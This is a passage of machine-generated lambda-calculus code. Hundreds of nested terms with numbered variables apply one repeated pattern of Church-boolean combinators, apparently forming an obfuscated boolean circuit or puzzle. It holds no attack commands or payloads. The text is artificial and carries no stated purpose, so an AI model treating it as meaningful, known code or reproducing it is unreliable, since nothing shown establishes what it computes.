(109)))(218)))(lambda s_1 lambda s_0 0))(lambda s_159 lambda s_117 159))))(((lambda
s_220 lambda s_106 ((lambda s_92 lambda s_231 ((92)(92))(231))(((lambda s_234 lambda
s_18 ((234)(18))(234))(106))((lambda s_79 lambda s_0 lambda s_149 ((79)(149))(0))
(220))))(((lambda s_17 lambda s_186 ((17)(186))(17))((lambda s_172 lambda s_0 lambda
s_158 ((172)(158))(0))(106)))(220)))(lambda s_0 lambda s_1 1))(lambda s_63 lambda s_197
63))))(((lambda s_6 lambda s_253 ((lambda s_229 lambda s_26 ((229)(229))(26))(((lambda
s_163 lambda s_194 ((163)(194))(163))(253))((lambda s_48 lambda s_151 lambda s_1 ((48)
(1))(151))(6))))(((lambda s_48 lambda s_20 ((48)(20))(48))((lambda s_131 lambda s_97
lambda s_212 ((131)(212))(97))(253)))(6)))(lambda s_0 lambda s_1 1))(lambda s_155
lambda s_170 155))))(((lambda s_94 lambda s_89 ((lambda s_96 lambda s_168 ((96)(96))
(168))(((lambda s_157 lambda s_68 ((157)(68))(157))(89))((lambda s_17 lambda s_115
lambda s_178 ((17)(178))(115))(94))))(((lambda s_219 lambda s_106 ((219)(106))(219))
((lambda s_34 lambda s_137 lambda s_215 ((34)(215))(137))(89)))(94)))(lambda s_0 lambda
s_1 0))(lambda s_194 lambda s_127 127))))(((lambda s_23 lambda s_10 ((lambda s_17
lambda s_19 ((17)(17))(19))(((lambda s_39 lambda s_41 ((39)(41))(39))(10))((lambda s_15
lambda s_235 lambda s_129 ((15)(129))(235))(23))))(((lambda s_253 lambda s_29 ((253)
(29))(253))((lambda s_7 lambda s_235 lambda s_233 ((7)(233))(235))(10)))(23)))(lambda
s_1 lambda s_0 0))(lambda s_69 lambda s_112 69))))(((lambda s_207 lambda s_232 ((lambda
s_218 lambda s_9 ((218)(218))(9))(((lambda s_119 lambda s_66 ((119)(66))(119))(232))
((lambda s_132 lambda s_102 lambda s_23 ((132)(23))(102))(207))))(((lambda s_146 lambda
s_45 ((146)(45))(146))((lambda s_237 lambda s_216 lambda s_182 ((237)(182))(216))
(232)))(207)))(lambda s_0 lambda s_1 1))(lambda s_214 lambda s_203 214))))(((lambda
s_112 lambda s_55 ((lambda s_25 lambda s_11 ((25)(25))(11))(((lambda s_189 lambda s_221
((189)(221))(189))(55))((lambda s_9 lambda s_203 lambda s_54 ((9)(54))(203))(112))))
(((lambda s_167 lambda s_207 ((167)(207))(167))((lambda s_74 lambda s_102 lambda s_155
((74)(155))(102))(55)))(112)))(lambda s_0 lambda s_1 1))(lambda s_156 lambda s_230
156))))(((lambda s_236 lambda s_210 ((lambda s_34 lambda s_192 ((34)(34))(192))
(((lambda s_114 lambda s_40 ((114)(40))(114))(210))((lambda s_232 lambda s_223 lambda
s_190 ((232)(190))(223))(236))))(((lambda s_222 lambda s_192 ((222)(192))(222))((lambda
s_133 lambda s_100 lambda s_57 ((133)(57))(100))(210)))(236)))(lambda s_0 lambda s_1
1))(lambda s_4 lambda s_177 4))))(((lambda s_238 lambda s_89 ((lambda s_42 lambda s_231
((42)(42))(231))(((lambda s_194 lambda s_11 ((194)(11))(194))(89))((lambda s_22 lambda
s_173 lambda s_189 ((22)(189))(173))(238))))(((lambda s_106 lambda s_237 ((106)(237))
(106))((lambda s_229 lambda s_233 lambda s_44 ((229)(44))(233))(89)))(238)))(lambda s_1
lambda s_0 1))(lambda s_87 lambda s_195 195))))(((lambda s_238 lambda s_77 ((lambda
s_242 lambda s_120 ((242)(242))(120))(((lambda s_239 lambda s_87 ((239)(87))(239))(77))
((lambda s_99 lambda s_98 lambda s_137 ((99)(137))(98))(238))))(((lambda s_142 lambda
s_111 ((142)(111))(142))((lambda s_92 lambda s_4 lambda s_139 ((92)(139))(4))(77)))
(238)))(lambda s_1 lambda s_0 1))(lambda s_70 lambda s_146 146))))(((lambda s_240
lambda s_191 ((lambda s_142 lambda s_159 ((142)(142))(159))(((lambda s_199 lambda s_51
((199)(51))(199))(191))((lambda s_207 lambda s_137 lambda s_58 ((207)(58))(137))
(240))))(((lambda s_22 lambda s_77 ((22)(77))(22))((lambda s_13 lambda s_65 lambda s_22
((13)(22))(65))(191)))(240)))(lambda s_1 lambda s_0 0))(lambda s_107 lambda s_72
107))))(((lambda s_56 lambda s_11 ((lambda s_32 lambda s_195 ((32)(32))(195))(((lambda
s_10 lambda s_95 ((10)(95))(10))(11))((lambda s_167 lambda s_191 lambda s_33 ((167)
(33))(191))(56))))(((lambda s_233 lambda s_177 ((233)(177))(233))((lambda s_72 lambda
s_38 lambda s_120 ((72)(120))(38))(11)))(56)))(lambda s_0 lambda s_1 1))(lambda s_159
lambda s_94 159))))(((lambda s_191 lambda s_160 ((lambda s_69 lambda s_61 ((69)(69))
(61))(((lambda s_250 lambda s_136 ((250)(136))(250))(160))((lambda s_135 lambda s_241
lambda s_181 ((135)(181))(241))(191))))(((lambda s_195 lambda s_49 ((195)(49))(195))
((lambda s_179 lambda s_62 lambda s_231 ((179)(231))(62))(160)))(191)))(lambda s_0
lambda s_1 0))(lambda s_219 lambda s_145 145))))(((lambda s_177 lambda s_146 ((lambda
s_217 lambda s_8 ((217)(217))(8))(((lambda s_76 lambda s_2 ((76)(2))(76))(146))((lambda
s_193 lambda s_131 lambda s_156 ((193)(156))(131))(177))))(((lambda s_10 lambda s_15
((10)(15))(10))((lambda s_141 lambda s_201 lambda s_243 ((141)(243))(201))(146)))
(177)))(lambda s_1 lambda s_0 0))(lambda s_92 lambda s_212 92))))(((lambda s_59 lambda
s_47 ((lambda s_110 lambda s_33 ((110)(110))(33))(((lambda s_181 lambda s_182 ((181)
(182))(181))(47))((lambda s_177 lambda s_213 lambda s_3 ((177)(3))(213))(59))))
(((lambda s_118 lambda s_129 ((118)(129))(118))((lambda s_12 lambda s_10 lambda s_246
((12)(246))(10))(47)))(59)))(lambda s_1 lambda s_0 0))(lambda s_71 lambda s_185 71))))
(((lambda s_228 lambda s_20 ((lambda s_248 lambda s_191 ((248)(248))(191))(((lambda
s_21 lambda s_223 ((21)(223))(21))(20))((lambda s_246 lambda s_14 lambda s_53 ((246)
(53))(14))(228))))(((lambda s_131 lambda s_217 ((131)(217))(131))((lambda s_114 lambda
s_165 lambda s_231 ((114)(231))(165))(20)))(228)))(lambda s_0 lambda s_1 0))(lambda
s_244 lambda s_112 112))))(((lambda s_66 lambda s_47 ((lambda s_75 lambda s_107 ((75)
(75))(107))(((lambda s_223 lambda s_173 ((223)(173))(223))(47))((lambda s_128 lambda
s_221 lambda s_2 ((128)(2))(221))(66))))(((lambda s_224 lambda s_63 ((224)(63))(224))
((lambda s_236 lambda s_64 lambda s_206 ((236)(206))(64))(47)))(66)))(lambda s_1 lambda
s_0 1))(lambda s_175 lambda s_159 159))))(((lambda s_52 lambda s_207 ((lambda s_197
lambda s_209 ((197)(197))(209))(((lambda s_164 lambda s_184 ((164)(184))(164))(207))
((lambda s_138 lambda s_133 lambda s_86 ((138)(86))(133))(52))))(((lambda s_97 lambda
s_239 ((97)(239))(97))((lambda s_89 lambda s_70 lambda s_23 ((89)(23))(70))(207)))
(52)))(lambda s_0 lambda s_1 1))(lambda s_76 lambda s_55 76))))(((lambda s_126 lambda
s_235 ((lambda s_202 lambda s_5 ((202)(202))(5))(((lambda s_96 lambda s_129 ((96)(129))
(96))(235))((lambda s_166 lambda s_161 lambda s_239 ((166)(239))(161))(126))))(((lambda
s_8 lambda s_96 ((8)(96))(8))((lambda s_237 lambda s_37 lambda s_73 ((237)(73))(37))
(235)))(126)))(lambda s_0 lambda s_1 0))(lambda s_155 lambda s_213 213))))(((lambda
s_125 lambda s_35 ((lambda s_85 lambda s_155 ((85)(85))(155))(((lambda s_38 lambda s_25
((38)(25))(38))(35))((lambda s_187 lambda s_20 lambda s_18 ((187)(18))(20))(125))))
(((lambda s_118 lambda s_27 ((118)(27))(118))((lambda s_129 lambda s_225 lambda s_215
((129)(215))(225))(35)))(125)))(lambda s_1 lambda s_0 1))(lambda s_39 lambda s_244
244))))(((lambda s_163 lambda s_168 ((lambda s_114 lambda s_159 ((114)(114))(159))
(((lambda s_205 lambda s_84 ((205)(84))(205))(168))((lambda s_4 lambda s_213 lambda
s_190 ((4)(190))(213))(163))))(((lambda s_100 lambda s_158 ((100)(158))(100))((lambda
s_16 lambda s_35 lambda s_153 ((16)(153))(35))(168)))(163)))(lambda s_1 lambda s_0 0))
(lambda s_81 lambda s_124 81))))(((lambda s_70 lambda s_226 ((lambda s_53 lambda s_224
((53)(53))(224))(((lambda s_60 lambda s_168 ((60)(168))(60))(226))((lambda s_157 lambda
s_229 lambda s_164 ((157)(164))(229))(70))))(((lambda s_187 lambda s_129 ((187)(129))
(187))((lambda s_175 lambda s_118 lambda s_117 ((175)(117))(118))(226)))(70)))(lambda
s_0 lambda s_1 0))(lambda s_28 lambda s_89 89))))(((lambda s_37 lambda s_158 ((lambda
s_57 lambda s_33 ((57)(57))(33))(((lambda s_24 lambda s_165 ((24)(165))(24))(158))
((lambda s_230 lambda s_167 lambda s_92 ((230)(92))(167))(37))))(((lambda s_195 lambda
s_174 ((195)(174))(195))((lambda s_202 lambda s_145 lambda s_5 ((202)(5))(145))(158)))
(37)))(lambda s_0 lambda s_1 0))(lambda s_170 lambda s_175 175))))(((lambda s_28 lambda
s_2 ((lambda s_172 lambda s_201 ((172)(172))(201))(((lambda s_229 lambda s_173 ((229)
(173))(229))(2))((lambda s_31 lambda s_150 lambda s_86 ((31)(86))(150))(28))))(((lambda
s_63 lambda s_205 ((63)(205))(63))((lambda s_209 lambda s_242 lambda s_221 ((209)(221))
(242))(2)))(28)))(lambda s_1 lambda s_0 0))(lambda s_61 lambda s_88 61))))(((lambda
s_246 lambda s_122 ((lambda s_177 lambda s_144 ((177)(177))(144))(((lambda s_119 lambda
s_229 ((119)(229))(119))(122))((lambda s_104 lambda s_140 lambda s_161 ((104)(161))
(140))(246))))(((lambda s_5 lambda s_139 ((5)(139))(5))((lambda s_33 lambda s_6 lambda
s_170 ((33)(170))(6))(122)))(246)))(lambda s_0 lambda s_1 0))(lambda s_254 lambda s_35
35))))(((lambda s_252 lambda s_152 ((lambda s_193 lambda s_134 ((193)(193))(134))
(((lambda s_195 lambda s_133 ((195)(133))(195))(152))((lambda s_151 lambda s_251 lambda
s_87 ((151)(87))(251))(252))))(((lambda s_9 lambda s_109 ((9)(109))(9))((lambda s_127
lambda s_51 lambda s_236 ((127)(236))(51))(152)))(252)))(lambda s_0 lambda s_1 1))
(lambda s_173 lambda s_207 173))))(((lambda s_164 lambda s_31 ((lambda s_130 lambda
s_31 ((130)(130))(31))(((lambda s_236 lambda s_82 ((236)(82))(236))(31))((lambda s_156
lambda s_164 lambda s_139 ((156)(139))(164))(164))))(((lambda s_231 lambda s_5 ((231)
(5))(231))((lambda s_61 lambda s_241 lambda s_11 ((61)(11))(241))(31)))(164)))(lambda
s_0 lambda s_1 1))(lambda s_72 lambda s_173 72))))(((lambda s_52 lambda s_194 ((lambda
s_50 lambda s_45 ((50)(50))(45))(((lambda s_91 lambda s_157 ((91)(157))(91))(194))
((lambda s_116 lambda s_65 lambda s_142 ((116)(142))(65))(52))))(((lambda s_142 lambda
s_149 ((142)(149))(142))((lambda s_17 lambda s_176 lambda s_107 ((17)(107))(176))
(194)))(52)))(lambda s_1 lambda s_0 0))(lambda s_106 lambda s_20 106))))(((lambda s_32
lambda s_17 ((lambda s_249 lambda s_12 ((249)(249))(12))(((lambda s_72 lambda s_50
((72)(50))(72))(17))((lambda s_186 lambda s_71 lambda s_17 ((186)(17))(71))(32))))
(((lambda s_154 lambda s_126 ((154)(126))(154))((lambda s_160 lambda s_249 lambda s_246
((160)(246))(249))(17)))(32)))(lambda s_0 lambda s_1 0))(lambda s_211 lambda s_237
237))))(((lambda s_88 lambda s_216 ((lambda s_186 lambda s_85 ((186)(186))(85))
(((lambda s_205 lambda s_85 ((205)(85))(205))(216))((lambda s_207 lambda s_97 lambda
s_11 ((207)(11))(97))(88))))(((lambda s_98 lambda s_202 ((98)(202))(98))((lambda s_47
lambda s_98 lambda s_20 ((47)(20))(98))(216)))(88)))(lambda s_1 lambda s_0 1))(lambda
s_239 lambda s_200 200))))(((lambda s_246 lambda s_9 ((lambda s_145 lambda s_64 ((145)
(145))(64))(((lambda s_16 lambda s_149 ((16)(149))(16))(9))((lambda s_119 lambda s_248
lambda s_62 ((119)(62))(248))(246))))(((lambda s_59 lambda s_151 ((59)(151))(59))
((lambda s_144 lambda s_196 lambda s_70 ((144)(70))(196))(9)))(246)))(lambda s_0 lambda
s_1 1))(lambda s_230 lambda s_105 230))))(((lambda s_228 lambda s_99 ((lambda s_203
lambda s_248 ((203)(203))(248))(((lambda s_68 lambda s_238 ((68)(238))(68))(99))
((lambda s_221 lambda s_86 lambda s_101 ((221)(101))(86))(228))))(((lambda s_35 lambda
s_91 ((35)(91))(35))((lambda s_46 lambda s_104 lambda s_2 ((46)(2))(104))(99)))(228)))
(lambda s_1 lambda s_0 1))(lambda s_239 lambda s_206 206))))(((lambda s_175 lambda s_21
((lambda s_187 lambda s_104 ((187)(187))(104))(((lambda s_95 lambda s_142 ((95)(142))
(95))(21))((lambda s_44 lambda s_10 lambda s_46 ((44)(46))(10))(175))))(((lambda s_191
lambda s_236 ((191)(236))(191))((lambda s_152 lambda s_53 lambda s_131 ((152)(131))
(53))(21)))(175)))(lambda s_1 lambda s_0 1))(lambda s_248 lambda s_68 68))))(((lambda
s_255 lambda s_124 ((lambda s_186 lambda s_221 ((186)(186))(221))(((lambda s_7 lambda
s_81 ((7)(81))(7))(124))((lambda s_17 lambda s_133 lambda s_45 ((17)(45))(133))(255))))
(((lambda s_62 lambda s_243 ((62)(243))(62))((lambda s_18 lambda s_184 lambda s_103
((18)(103))(184))(124)))(255)))(lambda s_0 lambda s_1 0))(lambda s_74 lambda s_21
21))))(((lambda s_34 lambda s_89 ((lambda s_5 lambda s_102 ((5)(5))(102))(((lambda s_23
lambda s_112 ((23)(112))(23))(89))((lambda s_152 lambda s_11 lambda s_78 ((152)(78))
(11))(34))))(((lambda s_182 lambda s_191 ((182)(191))(182))((lambda s_49 lambda s_11
lambda s_192 ((49)(192))(11))(89)))(34)))(lambda s_0 lambda s_1 1))(lambda s_233 lambda
s_217 233))))(((lambda s_13 lambda s_148 ((lambda s_26 lambda s_47 ((26)(26))(47))
(((lambda s_32 lambda s_201 ((32)(201))(32))(148))((lambda s_247 lambda s_150 lambda
s_41 ((247)(41))(150))(13))))(((lambda s_36 lambda s_123 ((36)(123))(36))((lambda s_140
lambda s_58 lambda s_240 ((140)(240))(58))(148)))(13)))(lambda s_0 lambda s_1 1))
(lambda s_71 lambda s_240 71))))(((lambda s_53 lambda s_242 ((lambda s_124 lambda s_157
((124)(124))(157))(((lambda s_10 lambda s_196 ((10)(196))(10))(242))((lambda s_196
lambda s_222 lambda s_253 ((196)(253))(222))(53))))(((lambda s_198 lambda s_90 ((198)
(90))(198))((lambda s_62 lambda s_164 lambda s_11 ((62)(11))(164))(242)))(53)))(lambda
s_1 lambda s_0 0))(lambda s_42 lambda s_170 42))))(((lambda s_31 lambda s_191 ((lambda
s_210 lambda s_227 ((210)(210))(227))(((lambda s_20 lambda s_175 ((20)(175))(20))(191))
((lambda s_53 lambda s_14 lambda s_218 ((53)(218))(14))(31))))(((lambda s_160 lambda
s_211 ((160)(211))(160))((lambda s_127 lambda s_68 lambda s_189 ((127)(189))(68))
(191)))(31)))(lambda s_1 lambda s_0 1))(lambda s_201 lambda s_115 115))))(((lambda
s_106 lambda s_141 ((lambda s_252 lambda s_95 ((252)(252))(95))(((lambda s_233 lambda
s_214 ((233)(214))(233))(141))((lambda s_116 lambda s_242 lambda s_15 ((116)(15))(242))
(106))))(((lambda s_165 lambda s_69 ((165)(69))(165))((lambda s_11 lambda s_104 lambda
s_19 ((11)(19))(104))(141)))(106)))(lambda s_0 lambda s_1 1))(lambda s_169 lambda s_246
169))))(((lambda s_170 lambda s_152 ((lambda s_143 lambda s_23 ((143)(143))(23))
(((lambda s_213 lambda s_92 ((213)(92))(213))(152))((lambda s_26 lambda s_133 lambda
s_18 ((26)(18))(133))(170))))(((lambda s_19 lambda s_113 ((19)(113))(19))((lambda s_233
lambda s_141 lambda s_250 ((233)(250))(141))(152)))(170)))(lambda s_0 lambda s_1 1))
(lambda s_168 lambda s_64 168))))(((lambda s_75 lambda s_12 ((lambda s_19 lambda s_134
((19)(19))(134))(((lambda s_227 lambda s_50 ((227)(50))(227))(12))((lambda s_36 lambda
s_122 lambda s_60 ((36)(60))(122))(75))))(((lambda s_83 lambda s_41 ((83)(41))(83))
((lambda s_115 lambda s_153 lambda s_13 ((115)(13))(153))(12)))(75)))(lambda s_1 lambda
s_0 1))(lambda s_64 lambda s_11 11))))(((lambda s_151 lambda s_132 ((lambda s_112
lambda s_210 ((112)(112))(210))(((lambda s_254 lambda s_197 ((254)(197))(254))(132))
((lambda s_50 lambda s_69 lambda s_204 ((50)(204))(69))(151))))(((lambda s_84 lambda
s_155 ((84)(155))(84))((lambda s_159 lambda s_109 lambda s_129 ((159)(129))(109))
(132)))(151)))(lambda s_0 lambda s_1 0))(lambda s_172 lambda s_214 214))))(((lambda
s_241 lambda s_237 ((lambda s_110 lambda s_101 ((110)(110))(101))(((lambda s_55 lambda
s_32 ((55)(32))(55))(237))((lambda s_175 lambda s_23 lambda s_78 ((175)(78))(23))
(241))))(((lambda s_231 lambda s_159 ((231)(159))(231))((lambda s_211 lambda s_22
lambda s_181 ((211)(181))(22))(237)))(241)))(lambda s_0 lambda s_1 0))(lambda s_213
lambda s_139 139))))(((lambda s_160 lambda s_15 ((lambda s_179 lambda s_69 ((179)(179))
(69))(((lambda s_164 lambda s_108 ((164)(108))(164))(15))((lambda s_115 lambda s_38
lambda s_75 ((115)(75))(38))(160))))(((lambda s_254 lambda s_8 ((254)(8))(254))((lambda
s_122 lambda s_38 lambda s_104 ((122)(104))(38))(15)))(160)))(lambda s_0 lambda s_1 1))
(lambda s_62 lambda s_93 62))))(((lambda s_4 lambda s_229 ((lambda s_28 lambda s_86
((28)(28))(86))(((lambda s_8 lambda s_135 ((8)(135))(8))(229))((lambda s_255 lambda
s_41 lambda s_73 ((255)(73))(41))(4))))(((lambda s_17 lambda s_52 ((17)(52))(17))
((lambda s_194 lambda s_187 lambda s_161 ((194)(161))(187))(229)))(4)))(lambda s_0
lambda s_1 0))(lambda s_10 lambda s_164 164))))(((lambda s_215 lambda s_9 ((lambda
s_255 lambda s_17 ((255)(255))(17))(((lambda s_255 lambda s_114 ((255)(114))(255))(9))
((lambda s_0 lambda s_213 lambda s_19 ((0)(19))(213))(215))))(((lambda s_129 lambda
s_57 ((129)(57))(129))((lambda s_100 lambda s_109 lambda s_224 ((100)(224))(109))(9)))
(215)))(lambda s_1 lambda s_0 1))(lambda s_185 lambda s_82 82))))(((lambda s_8 lambda
s_170 ((lambda s_130 lambda s_75 ((130)(130))(75))(((lambda s_44 lambda s_193 ((44)
(193))(44))(170))((lambda s_177 lambda s_142 lambda s_255 ((177)(255))(142))(8))))
(((lambda s_51 lambda s_154 ((51)(154))(51))((lambda s_228 lambda s_33 lambda s_234
((228)(234))(33))(170)))(8)))(lambda s_1 lambda s_0 1))(lambda s_189 lambda s_12 12))))
(((lambda s_19 lambda s_7 ((lambda s_143 lambda s_105 ((143)(143))(105))(((lambda s_28
lambda s_112 ((28)(112))(28))(7))((lambda s_114 lambda s_97 lambda s_38 ((114)(38))
(97))(19))))(((lambda s_95 lambda s_124 ((95)(124))(95))((lambda s_98 lambda s_100
lambda s_154 ((98)(154))(100))(7)))(19)))(lambda s_1 lambda s_0 1))(lambda s_76 lambda
s_238 238))))(((lambda s_56 lambda s_109 ((lambda s_40 lambda s_109 ((40)(40))(109))
(((lambda s_187 lambda s_217 ((187)(217))(187))(109))((lambda s_162 lambda s_44 lambda
s_172 ((162)(172))(44))(56))))(((lambda s_136 lambda s_24 ((136)(24))(136))((lambda
s_18 lambda s_64 lambda s_100 ((18)(100))(64))(109)))(56)))(lambda s_0 lambda s_1 1))
(lambda s_201 lambda s_234 201))))(((lambda s_84 lambda s_213 ((lambda s_86 lambda
s_241 ((86)(86))(241))(((lambda s_1 lambda s_118 ((1)(118))(1))(213))((lambda s_23
lambda s_160 lambda s_151 ((23)(151))(160))(84))))(((lambda s_122 lambda s_64 ((122)
(64))(122))((lambda s_226 lambda s_162 lambda s_200 ((226)(200))(162))(213)))(84)))
(lambda s_1 lambda s_0 0))(lambda s_190 lambda s_127 190))))(((lambda s_132 lambda
s_120 ((lambda s_214 lambda s_205 ((214)(214))(205))(((lambda s_37 lambda s_169 ((37)
(169))(37))(120))((lambda s_197 lambda s_187 lambda s_232 ((197)(232))(187))(132))))
(((lambda s_241 lambda s_60 ((241)(60))(241))((lambda s_7 lambda s_11 lambda s_25 ((7)
(25))(11))(120)))(132)))(lambda s_1 lambda s_0 1))(lambda s_81 lambda s_249 249))))
(((lambda s_87 lambda s_118 ((lambda s_102 lambda s_141 ((102)(102))(141))(((lambda
s_104 lambda s_60 ((104)(60))(104))(118))((lambda s_82 lambda s_24 lambda s_199 ((82)
(199))(24))(87))))(((lambda s_92 lambda s_155 ((92)(155))(92))((lambda s_19 lambda
s_185 lambda s_251 ((19)(251))(185))(118)))(87)))(lambda s_1 lambda s_0 1))(lambda s_9
lambda s_206 206))))(((lambda s_251 lambda s_128 ((lambda s_245 lambda s_63 ((245)
(245))(63))(((lambda s_230 lambda s_133 ((230)(133))(230))(128))((lambda s_250 lambda
s_188 lambda s_141 ((250)(141))(188))(251))))(((lambda s_28 lambda s_86 ((28)(86))(28))
((lambda s_171 lambda s_134 lambda s_241 ((171)(241))(134))(128)))(251)))(lambda s_0
lambda s_1 0))(lambda s_234 lambda s_194 194))))(((lambda s_249 lambda s_99 ((lambda
s_162 lambda s_65 ((162)(162))(65))(((lambda s_174 lambda s_9 ((174)(9))(174))(99))
((lambda s_22 lambda s_63 lambda s_77 ((22)(77))(63))(249))))(((lambda s_247 lambda
s_241 ((247)(241))(247))((lambda s_3 lambda s_10 lambda s_163 ((3)(163))(10))(99)))
(249)))(lambda s_0 lambda s_1 0))(lambda s_211 lambda s_66 66))))(((lambda s_90 lambda
s_95 ((lambda s_70 lambda s_124 ((70)(70))(124))(((lambda s_172 lambda s_105 ((172)
(105))(172))(95))((lambda s_161 lambda s_152 lambda s_92 ((161)(92))(152))(90))))
(((lambda s_118 lambda s_89 ((118)(89))(118))((lambda s_104 lambda s_132 lambda s_170
((104)(170))(132))(95)))(90)))(lambda s_1 lambda s_0 0))(lambda s_7 lambda s_153 7))))
(((lambda s_225 lambda s_241 ((lambda s_68 lambda s_101 ((68)(68))(101))(((lambda s_116
lambda s_210 ((116)(210))(116))(241))((lambda s_66 lambda s_224 lambda s_232 ((66)
(232))(224))(225))))(((lambda s_192 lambda s_97 ((192)(97))(192))((lambda s_82 lambda
s_187 lambda s_83 ((82)(83))(187))(241)))(225)))(lambda s_0 lambda s_1 0))(lambda s_236
lambda s_17 17))))(((lambda s_254 lambda s_218 ((lambda s_89 lambda s_135 ((89)(89))
(135))(((lambda s_205 lambda s_226 ((205)(226))(205))(218))((lambda s_89 lambda s_77
lambda s_245 ((89)(245))(77))(254))))(((lambda s_102 lambda s_11 ((102)(11))(102))
((lambda s_239 lambda s_127 lambda s_174 ((239)(174))(127))(218)))(254)))(lambda s_1
lambda s_0 0))(lambda s_143 lambda s_13 143))))(((lambda s_193 lambda s_129 ((lambda
s_108 lambda s_189 ((108)(108))(189))(((lambda s_104 lambda s_37 ((104)(37))(104))
(129))((lambda s_132 lambda s_138 lambda s_40 ((132)(40))(138))(193))))(((lambda s_230
lambda s_129 ((230)(129))(230))((lambda s_26 lambda s_17 lambda s_108 ((26)(108))(17))
(129)))(193)))(lambda s_1 lambda s_0 1))(lambda s_206 lambda s_111 111))))(((lambda
s_43 lambda s_17 ((lambda s_38 lambda s_19 ((38)(38))(19))(((lambda s_227 lambda s_78
((227)(78))(227))(17))((lambda s_159 lambda s_235 lambda s_172 ((159)(172))(235))
(43))))(((lambda s_35 lambda s_81 ((35)(81))(35))((lambda s_54 lambda s_155 lambda
s_181 ((54)(181))(155))(17)))(43)))(lambda s_0 lambda s_1 1))(lambda s_177 lambda s_125
177))))(((lambda s_183 lambda s_87 ((lambda s_161 lambda s_127 ((161)(161))(127))
(((lambda s_59 lambda s_243 ((59)(243))(59))(87))((lambda s_64 lambda s_88 lambda s_170
((64)(170))(88))(183))))(((lambda s_140 lambda s_51 ((140)(51))(140))((lambda s_227
lambda s_168 lambda s_197 ((227)(197))(168))(87)))(183)))(lambda s_1 lambda s_0 0))
(lambda s_251 lambda s_208 251))))(((lambda s_156 lambda s_126 ((lambda s_81 lambda
s_15 ((81)(81))(15))(((lambda s_76 lambda s_128 ((76)(128))(76))(126))((lambda s_69
lambda s_102 lambda s_215 ((69)(215))(102))(156))))(((lambda s_58 lambda s_216 ((58)
(216))(58))((lambda s_41 lambda s_75 lambda s_163 ((41)(163))(75))(126)))(156)))(lambda
s_0 lambda s_1 0))(lambda s_198 lambda s_136 136))))(((lambda s_42 lambda s_51 ((lambda
s_7 lambda s_73 ((7)(7))(73))(((lambda s_54 lambda s_104 ((54)(104))(54))(51))((lambda
s_28 lambda s_230 lambda s_226 ((28)(226))(230))(42))))(((lambda s_184 lambda s_46
((184)(46))(184))((lambda s_165 lambda s_90 lambda s_117 ((165)(117))(90))(51)))(42)))
(lambda s_0 lambda s_1 1))(lambda s_198 lambda s_25 198))))(((lambda s_35 lambda s_98
((lambda s_242 lambda s_196 ((242)(242))(196))(((lambda s_114 lambda s_55 ((114)(55))
(114))(98))((lambda s_242 lambda s_2 lambda s_55 ((242)(55))(2))(35))))(((lambda s_12
lambda s_166 ((12)(166))(12))((lambda s_210 lambda s_74 lambda s_25 ((210)(25))(74))
(98)))(35)))(lambda s_0 lambda s_1 1))(lambda s_244 lambda s_10 244))))(((lambda s_127
lambda s_225 ((lambda s_163 lambda s_111 ((163)(163))(111))(((lambda s_83 lambda s_224
((83)(224))(83))(225))((lambda s_55 lambda s_214 lambda s_246 ((55)(246))(214))(127))))
(((lambda s_252 lambda s_103 ((252)(103))(252))((lambda s_65 lambda s_69 lambda s_240
((65)(240))(69))(225)))(127)))(lambda s_0 lambda s_1 1))(lambda s_112 lambda s_186
112))))(((lambda s_187 lambda s_242 ((lambda s_6 lambda s_182 ((6)(6))(182))(((lambda
s_84 lambda s_179 ((84)(179))(84))(242))((lambda s_174 lambda s_103 lambda s_162 ((174)
(162))(103))(187))))(((lambda s_15 lambda s_82 ((15)(82))(15))((lambda s_188 lambda
s_59 lambda s_219 ((188)(219))(59))(242)))(187)))(lambda s_1 lambda s_0 1))(lambda
s_101 lambda s_248 248))))(((lambda s_117 lambda s_13 ((lambda s_39 lambda s_191 ((39)
(39))(191))(((lambda s_223 lambda s_203 ((223)(203))(223))(13))((lambda s_235 lambda
s_236 lambda s_121 ((235)(121))(236))(117))))(((lambda s_39 lambda s_99 ((39)(99))(39))
((lambda s_149 lambda s_242 lambda s_109 ((149)(109))(242))(13)))(117)))(lambda s_1
lambda s_0 0))(lambda s_83 lambda s_91 83))))(((lambda s_94 lambda s_53 ((lambda s_11
lambda s_121 ((11)(11))(121))(((lambda s_208 lambda s_103 ((208)(103))(208))(53))
((lambda s_190 lambda s_234 lambda s_51 ((190)(51))(234))(94))))(((lambda s_137 lambda
s_146 ((137)(146))(137))((lambda s_9 lambda s_41 lambda s_68 ((9)(68))(41))(53)))(94)))
(lambda s_0 lambda s_1 0))(lambda s_227 lambda s_98 98))))(((lambda s_207 lambda s_251
((lambda s_137 lambda s_118 ((137)(137))(118))(((lambda s_74 lambda s_37 ((74)(37))
(74))(251))((lambda s_151 lambda s_237 lambda s_222 ((151)(222))(237))(207))))(((lambda
s_213 lambda s_152 ((213)(152))(213))((lambda s_225 lambda s_124 lambda s_202 ((225)
(202))(124))(251)))(207)))(lambda s_1 lambda s_0 1))(lambda s_105 lambda s_79 79))))
(((lambda s_186 lambda s_165 ((lambda s_75 lambda s_54 ((75)(75))(54))(((lambda s_0
lambda s_110 ((0)(110))(0))(165))((lambda s_72 lambda s_239 lambda s_11 ((72)(11))
(239))(186))))(((lambda s_132 lambda s_10 ((132)(10))(132))((lambda s_20 lambda s_161
lambda s_43 ((20)(43))(161))(165)))(186)))(lambda s_0 lambda s_1 0))(lambda s_81 lambda
s_194 194))))(((lambda s_207 lambda s_64 ((lambda s_55 lambda s_36 ((55)(55))(36))
(((lambda s_114 lambda s_151 ((114)(151))(114))(64))((lambda s_219 lambda s_104 lambda
s_231 ((219)(231))(104))(207))))(((lambda s_87 lambda s_21 ((87)(21))(87))((lambda s_71
lambda s_158 lambda s_102 ((71)(102))(158))(64)))(207)))(lambda s_1 lambda s_0 0))
(lambda s_243 lambda s_162 243))))(((lambda s_28 lambda s_177 ((lambda s_213 lambda
s_109 ((213)(213))(109))(((lambda s_183 lambda s_174 ((183)(174))(183))(177))((lambda
s_44 lambda s_241 lambda s_180 ((44)(180))(241))(28))))(((lambda s_123 lambda s_190
((123)(190))(123))((lambda s_193 lambda s_128 lambda s_42 ((193)(42))(128))(177)))
(28)))(lambda s_1 lambda s_0 0))(lambda s_80 lambda s_36 80))))(((lambda s_251 lambda
s_168 ((lambda s_207 lambda s_98 ((207)(207))(98))(((lambda s_97 lambda s_156 ((97)
(156))(97))(168))((lambda s_255 lambda s_186 lambda s_3 ((255)(3))(186))(251))))
(((lambda s_0 lambda s_254 ((0)(254))(0))((lambda s_213 lambda s_88 lambda s_179 ((213)
(179))(88))(168)))(251)))(lambda s_1 lambda s_0 0))(lambda s_132 lambda s_46 132))))
